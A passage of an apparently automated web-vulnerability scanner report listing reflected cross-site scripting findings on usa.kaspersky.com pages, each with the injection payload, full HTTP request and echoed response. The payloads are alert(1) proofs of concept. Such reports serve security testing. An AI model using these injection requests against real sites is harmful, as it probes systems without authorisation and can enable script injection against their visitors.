s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/category1c506"-alert(1)-"29a4b80ccc8/page-variables-sprop1/downloads";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.25. http://usa.kaspersky.com/category/page-variables-sprop1/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /category/page-variables-sprop1/downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9709"><script>alert(1)</script>28ebc1934ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoryf9709"><script>alert(1)</script>28ebc1934ec/page-variables-sprop1/downloads HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:28:50 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686130"
Content-Type: text/html; charset=utf-8
Content-Length: 30289
Date: Sat, 18 Dec 2010 15:28:57 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/categoryf9709"><script>alert(1)</script>28ebc1934ec/page-variables-sprop1/downloads" />
...[SNIP]...

1.26. http://usa.kaspersky.com/category/page-variables-sprop1/downloads [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /category/page-variables-sprop1/downloads

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a33ef"-alert(1)-"aa94671ef97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/page-variables-sprop1a33ef"-alert(1)-"aa94671ef97/downloads HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:30:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686242"
Content-Type: text/html; charset=utf-8
Content-Length: 30192
Date: Sat, 18 Dec 2010 15:30:50 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
k You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/category/page-variables-sprop1a33ef"-alert(1)-"aa94671ef97/downloads";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.27. http://usa.kaspersky.com/category/page-variables-sprop1/downloads [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /category/page-variables-sprop1/downloads

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59786"><script>alert(1)</script>6d3da3013c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/page-variables-sprop159786"><script>alert(1)</script>6d3da3013c2/downloads HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:30:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686223"
Content-Type: text/html; charset=utf-8
Content-Length: 30289
Date: Sat, 18 Dec 2010 15:30:30 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/category/page-variables-sprop159786"><script>alert(1)</script>6d3da3013c2/downloads" />
...[SNIP]...

1.28. http://usa.kaspersky.com/category/page-variables-sprop1/downloads [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /category/page-variables-sprop1/downloads

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0b4c"><script>alert(1)</script>79793a3a9df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/page-variables-sprop1/downloadsa0b4c"><script>alert(1)</script>79793a3a9df HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:32:03 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686323"
Content-Type: text/html; charset=utf-8
Content-Length: 30289
Date: Sat, 18 Dec 2010 15:32:11 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/category/page-variables-sprop1/downloadsa0b4c"><script>alert(1)</script>79793a3a9df" />
...[SNIP]...

1.29. http://usa.kaspersky.com/category/page-variables-sprop1/downloads [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /category/page-variables-sprop1/downloads

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a121d"-alert(1)-"72b2cbb84aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/page-variables-sprop1/downloadsa121d"-alert(1)-"72b2cbb84aa HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:32:21 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686341"
Content-Type: text/html; charset=utf-8
Content-Length: 30192
Date: Sat, 18 Dec 2010 15:32:27 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/category/page-variables-sprop1/downloadsa121d"-alert(1)-"72b2cbb84aa";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.30. http://usa.kaspersky.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfaaa"><script>alert(1)</script>4b843794b15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadscfaaa"><script>alert(1)</script>4b843794b15 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.2.10.1292684729; gpv_pageName=Homepage; s_nr=1292684738017-Repeat

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:18:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685533"
Content-Type: text/html; charset=utf-8
Content-Length: 30103
Date: Sat, 18 Dec 2010 15:18:58 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloadscfaaa"><script>alert(1)</script>4b843794b15" />
...[SNIP]...

1.31. http://usa.kaspersky.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52d6a"-alert(1)-"0c8f7d235d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads52d6a"-alert(1)-"0c8f7d235d7 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.2.10.1292684729; gpv_pageName=Homepage; s_nr=1292684738017-Repeat

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:19:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685550"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:19:16 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads52d6a"-alert(1)-"0c8f7d235d7";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.32. http://usa.kaspersky.com/downloads [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2680"><script>alert(1)</script>58a84fff1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads?e2680"><script>alert(1)</script>58a84fff1b=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.2.10.1292684729; gpv_pageName=Homepage; s_nr=1292684738017-Repeat

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:16:41 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685401"
Content-Type: text/html; charset=utf-8
Content-Length: 46556
Date: Sat, 18 Dec 2010 15:16:55 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads?e2680"><script>alert(1)</script>58a84fff1b=1" />
...[SNIP]...

1.33. http://usa.kaspersky.com/downloads/documentation [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/documentation

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e74da"><script>alert(1)</script>83cd17c7900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadse74da"><script>alert(1)</script>83cd17c7900/documentation HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:30:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686256"
Content-Type: text/html; charset=utf-8
Content-Length: 30187
Date: Sat, 18 Dec 2010 15:31:03 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloadse74da"><script>alert(1)</script>83cd17c7900/documentation" />
...[SNIP]...

1.34. http://usa.kaspersky.com/downloads/documentation [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/documentation

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2943"-alert(1)-"a20475154fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloadsa2943"-alert(1)-"a20475154fd/documentation HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:31:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686278"
Content-Type: text/html; charset=utf-8
Content-Length: 30090
Date: Sat, 18 Dec 2010 15:31:25 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloadsa2943"-alert(1)-"a20475154fd/documentation";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.35. http://usa.kaspersky.com/downloads/documentation [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/documentation

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd891"><script>alert(1)</script>273050e1a23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/documentationfd891"><script>alert(1)</script>273050e1a23 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:33:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686388"
Content-Type: text/html; charset=utf-8
Content-Length: 30313
Date: Sat, 18 Dec 2010 15:33:14 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/documentationfd891"><script>alert(1)</script>273050e1a23" />
...[SNIP]...

1.36. http://usa.kaspersky.com/downloads/documentation [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/documentation

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1154"-alert(1)-"86c0bbe7ae5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/documentatione1154"-alert(1)-"86c0bbe7ae5 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:33:27 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686407"
Content-Type: text/html; charset=utf-8
Content-Length: 30215
Date: Sat, 18 Dec 2010 15:33:35 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/documentatione1154"-alert(1)-"86c0bbe7ae5";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.37. http://usa.kaspersky.com/downloads/documentation [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/documentation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 447ba"><script>alert(1)</script>f8f4042be49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/documentation?447ba"><script>alert(1)</script>f8f4042be49=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:28:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686095"
Content-Type: text/html; charset=utf-8
Content-Length: 46884
Date: Sat, 18 Dec 2010 15:28:35 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/documentation?447ba"><script>alert(1)</script>f8f4042be49=1" />
...[SNIP]...

1.38. http://usa.kaspersky.com/downloads/free-30-day-trials [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-30-day-trials

Issue detail

